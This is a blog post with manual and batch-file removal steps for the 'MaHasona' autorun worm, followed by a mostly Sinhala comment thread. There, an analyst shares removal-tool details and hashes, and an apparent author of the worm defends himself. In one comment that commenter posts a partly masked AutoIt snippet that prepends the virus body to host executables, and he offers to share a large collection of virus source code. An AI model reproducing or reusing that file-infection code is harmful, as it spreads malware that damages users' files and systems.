1. Open Task Manager (Ctrl+Shift+Ecs)
2. Under the processes tab find explorar.exe not explorer.exe and 'End Task'
3. Run --> (type)C:\windows
4. Find a file named "autofrun.inf" and not "autorun.inf". It may be hidden. If so Tools-->Folder Options-->View--> (Check)"Show hidden files and folders" and also (Uncheck)"Hide protected Oparating system files"-->Apply-->OK. Now again look for "autofrun.inf" not "autorun.inf" and delete it.
5. Now go in to the "System32" folder in the same directory and find "explorar.exe" and not "explorer.exe" and delete it.
Now your PC is safe. If the above didn't work for you, boot the PC in safe mode(Keep hitting F8 when your PC start up and select safe mode.)
1. Run-->[type]cmd[ENTER]
2.type the following
cd/
cd windows
attrib -s -h -r -a autofrun.inf
del/f autofrun.inf
cd system32
attrib -s -h -r -a explorar.exe
del/f explorar.exe
then your done. If you are not sure with this also, just copy the above code and paste it on to a new notepad.
Save it as "mahasonaRemoval.bat" on your desktop.
Now just double click and it will fix the problem for you. Now reboot the PC as normal
To remove the virus prom your pen drive.
To remove the virus prom your pen drive.
1. Hold the shift key when inserting the Pen drive to the PC
2. Then right click and Open OR Explore
3. Unhide all files mentioned as above and delete the autofrun.inf and any unknown *.exe
4. Now your pen drive is also safe.
Alternatively you could download third party S/W to help you through http://answers.yahoo.com/question/index?qid=20090726065303AApWPsI
Hope this post was informative to you.
Friend ,
ReplyDeletedel/f explorar.exe will not work if you already infected, because explorar.exe is MaHasona's running process. You will see error message like "Access is denied."
I have analyzed MaHasona.exe virus and published the report and a removal tool use it to remove it.
http://it.web44.net/VirusDetails/MaHasona.exe_Recover_Report.html
Submit any malicious files to my website. Then I will able to provide reports and removal tools for them.
Thank You.
Click Here To Download MaHasona Removal Tool
ReplyDelete@Daham & Kanishka
ReplyDeleteI never had to face this problem. But, appreciate both of you for give some valuable information who really need it. :)
ooopzzz
ReplyDeleteහලෝ K_ZONE, AutoIt තියෙන්නේ worms ලියන්න නෙවෙයි. ප්රයෝජනවත් දෙයකට දැනුම යොදවනවා, නිකම් අමාරුවේ වැටෙන්නේ නැතුව.
ReplyDeletethanks very very very much for this
ReplyDeleteu have to end the process from task manager....press ctrl+alt+del got task manager and to process and locate mahasona.exe and end the process....
ReplyDelete""""හලෝ K_ZONE, AutoIt තියෙන්නේ worms ලියන්න නෙවෙයි. ප්රයෝජනවත් දෙයකට දැනුම යොදවනවා, නිකම් අමාරුවේ වැටෙන්නේ නැතුව. """"
ReplyDeletemr.කනිශ්ක, මම Autoit ඉගෙන ගත්තෙ වෛරස් වත් වර්ම්ලා වත් හදන්න නෙමෙයි. වැරදිමකින් එලියට ගියාට කාටවත් රිද්දන්න කරපු දෙයකුත් නෙමෙයි. අනිත් එක මට වැඩ පෙන්නන්න වෛරස් හදන්න ඔනි නම්, ඔය වගේ චුටි චුටි වැඩ කරන කෙනෙකුත් නෙමෙයි. mahasonage තියෙන්නෙ lines 20ටත් අඩු code එකක්, එත් එක out වෙලා කියල මම දැන ගන්න වෙලාව වෙනකොට මම tasm වල try කර කර හිටපු stealth coding එක lines 20,000 කටත් වැඩියි. මම පොර වෙන්න කලානම් මම එලියට දාන්නෙ ඒ වගේ එකක්. මට Autoit කියන්නේ මම තනියම ආසවෙන් ඉගන ගත්ත තවත් එක පරිගනක භාශාවක් විතරයි ඔයා නම දැන ගත්ත පලියට මට autoit ගැන...........
මේ ලොකු උන්නැහේ ඔහේ මට AutoIt ගැනවත් Computer Languages ගැනවත් කියලා දෙන්න ඕන නෑ. virus ලියන එක ඔහෙට හරි ලොකු දෙයක් වුනාට අපිට ඒවා ලොකු දේවල් වුනෙ 9, 10 පන්තිවලදී.(මමත් ආසාවට ලියලා බලලා තියනවා file system එක recursive විදියට crawl කරලා executables infect කරන්න පුලුවන් vir එකක් ඒකට Autorun.inf ඕන නෑ spread වෙන්න. ඒත් මම එවා test කලෙ virtual machine එකේ. අනිත් එක මම ඒවා ලිව්වෙ මගේ ආසාවට මිසක් ලොකු දෙයක් කියලා හිතාගෙන නොවෙයි.)
ReplyDeleteමහ ලොකු stealth coding එක...හි..හි.. පිස්සු හැදෙනවා ඔහෙගෙ කතා ඇහුවම ඇත්තටම. පණ්ඩිතකම අර මොකක්ද එකටත් වඩා ලොකුයිලු නේ.
line 20 වුනාට පරිගණක දැනුම අඩු අයට එමගින්(මහසෝනා) ගැටලු ඇතිවෙලා තියනවා.
ඔහෙට ඇයි බැරි උනේ "anti mahasona" එකක් හදලා ඒ විදියටම යවන්න.?? සැර vir එකක් ලියුව පලියට පොර වෙනවා කියලා හිතන්න තරම් බාල අයත් ඉන්නවනෙ!
turbo assembly වලින් virus එකක් ලියලා එලියට දාලා බලනවා වෙන්නෙ මොකක්ද කියලා. වෙන්නෙ වැඩ 2i බොහෝ විට අලුත් virus guards වල behavior detection එකට අහුවෙයි. නැත්නම් තමුන්නැහේ මේ රටේ නීතියට අහුවෙයි තොරතුරු පද්ධති වලට හානි පැමිණවීම සම්බන්දව.
ඒක නිසා පණ්ඩිතකම් පැත්තකින් දාලා අලුත් විදියකට හිතන්න පුරුදුවෙනවා.
පරිගණක විද්යාව හෝ තොරතුරු තාක්ෂණය කියන්නෙ මේ වගේ මේ වගේ ලාමක දේවල් නොවෙයි.
Thumbs up Kaniskha. Excellent reply
ReplyDeletefollow this link and read the last post.
http://www.facebook.com/topic.php?uid=94476133047&topic=9228
It was posted on July 6, 2009. But a year later he claims it to be a mistake. wonder why...? :)
mr,කනිශ්ක අයියෙ, මට වෛරස් ලියන එක ඔයා හිතන වදියට ලොකූ දෙයක්වත් මම පොර වෙන්න කරපු දෙයක්වත් නෙමෙයි මම ඒක කලිනුත් කිව්වා ඔයාට, ඔයාලා වගේ මම 9, 10 කාලෙ වත් වෛරස් හැදුවෙ ලොකු දේවල් කියලා හිතගෙන නෙමෙයි,
ReplyDeleteඅනිත් එක මමත් එක test කලේ මගෙ VM එකේ මම තමත් දන්නෙ නැහැ ඒක එලියට ගිය හැටි. සමහරවිට network එකෙන් වෙන්න ඇති (VN). (ඒ දවස් වල 10 වසරෙ පොඩි එකානෙ කොහොමද virtual network ගැන දන්නේ)
ඔයා කිව්වා වගේම "පරිගණක දැනුම අඩු අයට එමගින්(මහසෝනා) ගැටලු ඇතිවෙලා" කියන එක මම පිලිගන්නවා, එක ගැන Google කලාම මට එක හොදටම තෙරෙනවා, මම දන්නවා ඔයත් ඒ අය වෙනුවෙන් ගොඩක් මගහන්සි උනා කියලා, ඔයාගේ removal tool එක ඔයා අප්ලෝඩ් කරපු දවසෙම මම ටෙස්ට් කලා. එකෙන් මහසොනා remove කරන්න බැරි උනත් උත්සහය වටිනවා,
ඔයාගෙ කමෙන්ට් එක දැක්කම ඔයත් ethical hacking ගැන හොයලා තියෙනවා කියලා මට තෙරෙනවා. ලංකාව වගේ රටකට ඒ වගේ අය ගොඩක් වටිනවා රට ඉස්සටහට යන්න. පොතෙන් ඉගන ගත්ත ප්රොග්රැමර් කෙනෙකුට කරන්න පුලුවන් බහුජතික කම්පනි එකක පිටරට බොසෙක්ගෙ කකුල් 2 ලග වැඩ කරන්න විතරයි.
අනිත් එක අපේ අයට පිට රටවල් වල හදපු සොෆ්ට්වයා ක්රැක් කරකර පැච් දදා වැඩ කරන කොට හරි ලොකුයි ඒ ගැන බ්ලොග් පොස්ට් දාන්නෙ පුම්බගෙන, එවගෙ තියෙන keyloggers, blackdoors ගැන අපේ හරක්ට ගානක් නැහැ, එත් එවුන්ට අපෙ එකෙක්ගෙ එකක් දැක්කම තමයි ජාතික ආරක්ශාවයි, නිතියයි මතක් වෙන්නෙ,
තව කට්ට්යකට ඉන්ගිරිසියෙන් "wonder why...? :)" වෙලා, වොන්ඩ වෙන්න ඔන උබලා ගැනම. ඔව් ඉතින් සුද්දා හදන v1rus අවාම උඩ බලගෙන ඉදලා, අපේ කෙනෙක්ගෙ පුන්චි වැරද්දක් උනාම ලේ රත් වෙන එවුන්ට ඉන්ග්ලිශ් වලින් වචන 2ක් ගැහුවම හරි කෙලියයිනෙ,, ලැජ්ජයි ! මේ රටේ නීති හදන්න ඕනි ඒ වගේ උන් මේ ලස්සන ලංකාවෙන් එලවන්න.
මම 10,11 වසර වගේ ඉන්නකාලේ penetration testing, kernel Base එක ගැන ඉගනගන්න අසවට වෛරස් ගැන ඉගන ගත්තා මිසක් කවවත් රිද්දලා සතුටු වෙන්න පුලුවන් කෙනෙක් නෙමෛ මම. අනිත් එක මම ඒ ගත්ත දැනුමෙන් හදපු ඔපන් සොස් ඉන්ටලිජන්ට් වෛරස් ගර්ඩ් එක මට හදන්න පුලුවන් උනේ මම ඒ ගැන එහෙම හරි ඉගන ගනිපු හින්දා.
ඔයා කියපු PE infecting Autoit වලිනුත් කරන්න පුලුවන්.
###########################################
$host_body = Fi####ead($host)
$my_body = FileRead(@AutoItExe)
$ret = (Stri####Str($host_body, "[h0st]", True) = 0)
If ($ret) Then
$handle = FileOpen($host, 2)
$####= ($h####e <> -1)
If ($ret) Then
$host_body = "[h0st]" & $host_body
FileWrite($handle, $my####y & $host_body)
F####ose($handle)
EndIf
###########################################
ලෝ ලෙවල් ලැන්ග්වෙජස් පවිච්චි කරනවට වඩා එක ගොඩක් ලෙසියෙන්. ඉතින් කනිශ්ක අයියෙ, ඔයාම කියන්න ඔයා PE infect කරන්න දන්නෙ නැත්නම්, ඔයා කොහොමද දැනගන්නේ infect signature එක අයින් කරන්න? එතකොට, ඔවා හදන්නෙ කාව හරි රිද්දන්නමද? එහෙම නැත්නම් පොර වෙන්නද? මිනිහෙක් පිනන්න ඉගන ගන්නනම්, වතුරට බහින්න ඔනි. Anonymous ලා වගේ අය තැපැලෙන් පීනන්න ඉගෙනගෙන, කවදහරි වතුරකට වැටුන දවසකත් Thumb"S" up තමයි.
පණ්ඩිතකම නම් තාමත් අඩුවෙලා නැති හැඩයි......
ReplyDeleteඔයා ජාතික ආරස්සාවයි,ethical හැකිනුයි සේරම පටලෝගෙන.
මම ඔයාගෙ ඉංගිරිසි වචනයක් අල්ලාගෙන බැන්නා නොවෙයි. මට ඒක කියවනකොට හිනාගියා ඒකයි. මට මොකටද ඔයා ගැන ලේ රත් වෙන්නෙ! හොදයි ඒ වල්පල් පැත්තකට දාමු.
මට ඔයාගෙ reply එක බැලුවාම ගැටලු කිහිපයක් එනවා.
VM එකේ network එකෙන් mahasona එලියට ගියා කිව්ව කතාව මට පිලිගන්න බෑ මොකද මම mahasona analyze කරනකොට මට ඒකෙ කිසිම network activity එකක් අහුවුනේ නෑ. ඒ කිව්වෙ "මහසෝනා" local data පිටට යවන්න හෝ remote data ඇතුලට ගන්න කිසිම port එකක් use කලේ නෑ.ඉතින් අද්භූත විදියකින් පිටට ගියාද!
අනිත් එක තමයි මල්ලී mahasona අයින් කරන්න හදපු tool එකෙ PE infections reomve කිරීමක් කරන්නෙ ඕන නෑ. මොකද mahasona ගෙ කිසිම PE infection කිරීමක් මට අහුවුනේ නෑ.එහෙම එකක් තිබුනා නම් අහුවෙන්නම ඕන.
අනිත් එක මම mahasona detect කරගන්න භාවිතා කලේ file එකෙ MD5 signature එක මොකද mahasona කියන්නෙ polymorphic එකක් නොවෙයි. අනිත් අතට PE infections අයින් කොරන්න ගිහින් අනුන්ගෙ files destroy වුනාම කොහෙවත් ඉන්න මගෙ බෙල්ල තමයි හිරවෙන්නෙ.
මම මුලින් අහුවුන mahasona ගෙ තිබුනෙ 9F5A508D6725EB6FB11B445274BA9A52 කියන MD5 එක.
මම ඒකට හදපු tool එක කීප පාරක්ම මගෙ VM එකෙත් test කරලා mahasona ගිහිපු අයගෙ PC වලත් test කරලා තමයි publish කලේ. මට පස්සෙ තව mahasona එකක් හම්බුනා වෙන MD5 එකකින් (0A12CDC1A916387857DD73AD9D2DAFEF) ඊට පස්සෙ මම ඒකටත් මගේ tool එක update කරලා මගෙ කාලය නාස්ති ක්රගෙන කීප පාරක්ම test කරලා තමයි නැවත publish කලෙ ඒක තමයි දැන් මගෙ site එකෙ තියෙන්නෙ. මට හිතාගන්න බැරි ඔයා ගාව තියන මහසෝනා එක විතරක් අයින් වුනේ නැත්තෙ මොකද කියලයි.
මම අහපු එක ගැටලුවකට පිලිතුරු නොදී ඔයා හතරවරං කියවනවා. ඇයි ඔයා anti mahasona එකක් හදලා ඒ විදියටම යැව්වෙ නැත්තෙ? ඔයාට ඔයතරම් සත්ව කරුණාව තිබුනා නම් අඩුගානෙ removal tool එකක් වත් හදලා publish ක්රන්න තිබුනා නෙ!, ඒත් බැරිනම් mahasona එකෙ source code එක release කරන්න තිබුනානෙ removal program එකක් හදන අයගෙ කාලය නාස්ති නොකර..
මල්ලී මට ඔයා ගැන ලේ රත් වෙන්න දෙයක් නම් නෑ මම සර්ව සම්පූර්ණ කෙනෙක්යැ! කුණුවෙලා දියවෙලා පොලොවට පස් වන ශරීරයක් දරාගෙන ඉන්න මට ඔයාගෙ වැඩ වලින් මොනවට නම් ලේ රත්වෙන්නද.......
හ්ම්... ඔයාගෙ මහසෝනාගෙ polymorphic behaviour එකක් තියනවා තමයි මල්ලී. මට හම්බවුන sample කිහිපයක md5 වෙනස් තමයි. එත් මම අහපු ඒවාට පිලිතුරක් ඕන.
ReplyDeleteඋත්තරේ මේකයි. polymorphic behavior කියන්නෙ වෙනස් වෙනව කියන එකනෙ, ඉන්න පද්ධතිය අනුව, ප්රොසෙසෙර් එකෙ අර්කිටෙක්ච්ර් එක අනුව එයා ඉන්න හැටි වෙනස්. නෙට්ව්ර්ක් එකක් නැත්නම්(එහෙම නැත්නම් ගොඩක් අරක්ශාකරි උනෝත්) එයා තවදුරටත් පින්ග් කරකර ඉන්න වනම් හරි ඒ කොඩ් එක්සිකියුට් කරනවනම් හරි ෆයර් වොල් එකටම නිකම්ම අහුවෙනවනෙ, හැබැයි මහසොනාගෙ නම් ලොකු ලොකු දෙවල් නැ, නෙට්වක් ඩ්රියිව් එකක් තිබ්බොත් නම් රින්ගයි.
ReplyDeleteදැන් එවා වැඩක් නැහැ, ඒ අවුරුදු 4කට කලින් කතා. අනිත් එක, දැන් හැම වෛරස් ගාර්ඩ් එකකින්ම මහසොනා අදුන ගන්නවා. ඒ ගොඩක් කම්පනි වලට ෆයිල් එක අප්ලොඩ් කරලා රිපොර්ට් කලෙත් මම. මම මහසොනා අයින් කරන්න System_Cleaner එකක් release කරලා හුගක් අය තමත් antimalware application එකක් විදියට පාවිච්චි කරන්නෙ ඒක. ඒත් මම කවදාවත් source code එක නම් release කරන්නෙ නැහැ. මොකද අපේ අය ඊට පස්සෙ කරන දේ මම දන්න නිසා. එත් ඉගන ගන්න කෙනෙකුට මම එක දෙන්න කැමතියි, දැනට මම ලග තියෙන වෛරස් වල සොස් කොඩ් එකතුව 1000 කට වැඩියි. ගොඩක් එවා, එවා ලියපු අයගෙන්ම හැකින් ගැන තියෙන ෆොරම් වලදි ඉල්ලලා මෙල් කරගනිපු ඒවා. ඉගන ගන්නවනම් මම එවත් දෙන්නම් හැබැයි හොද කෙනෙක්ට විතරයි. අනිත් එක ASM ඉගන ගන්නවනම් හොදම උදාහරන තියෙන්නෙ ඒවගෙ.
හ්ම්.. හොදයි හොදයි. ඔයා ඔයාගෙ වැඩ දිගටම කරගෙන යන්න. අන් අයට ගැටලු ඇතිනොවන විදියට.
ReplyDeleteහරි එහෙනම් දහම්ලා, කනිශ්කලත් ඔයාලගේ වැඩ හොදට කරගෙන යන්න. හැබැයි මට එක දෙයක් ගැන සතුටුයි, ඒ මහසොනාගෙන් පස්සෙ ගොඩක් අය තමන්ගේ පද්ධති වල අරක්ෂාව ගැන ගොඩක් හොයල බලනවා, ඉගන ගන්නවා. එහෙනම් මම ගියා,, ආයේ ඕන උනොත් එන්නම්!
ReplyDeleteපද්ධති අරක්ෂාව, වෛරස්, බැක්ඩෝස්, වර්ම්, කීලොගින්, ෆේක් ප්රොක්සි, ඩ්එල්එල් ඉන්ජ්ක්සන්, ඩේටා ඩීක්රයිප්ටින්, එස්කිව්එල් ඉන්ජ්ක්සන්, රිවස් ඉන්ජිනියරින්ග් වගේ මාතෘකා ගැන ඕනි උදව්වක් මගෙන්! හැබැයි හොද දේට විතරයි!
thanx......this is very usable...:)
ReplyDeleteponna weda
ReplyDeleteI honestly am glad to witness something like this debate.i just googled "කනිශ්ක " .just learned the name after that "taboo - kudulal" incident.I'm proud that we do have people with extensive knowledge on hardcore programmingand doing research on them other than releasing a paper'" to keep the job".(I'm not a programmer learned some c and c++ 20 years ago)ඔහොම යන් ඔහොම යන්
ReplyDeletekanishka,
ReplyDeletemama progamming danne neha,mage pen drives 02 evari.podi evunta english medium lesson kiya dena pc eka infect vela.
Pc format karala,aluth pen drives gaththoth goda da ganna haki da?
wish u a great future, my children also must have at least some future.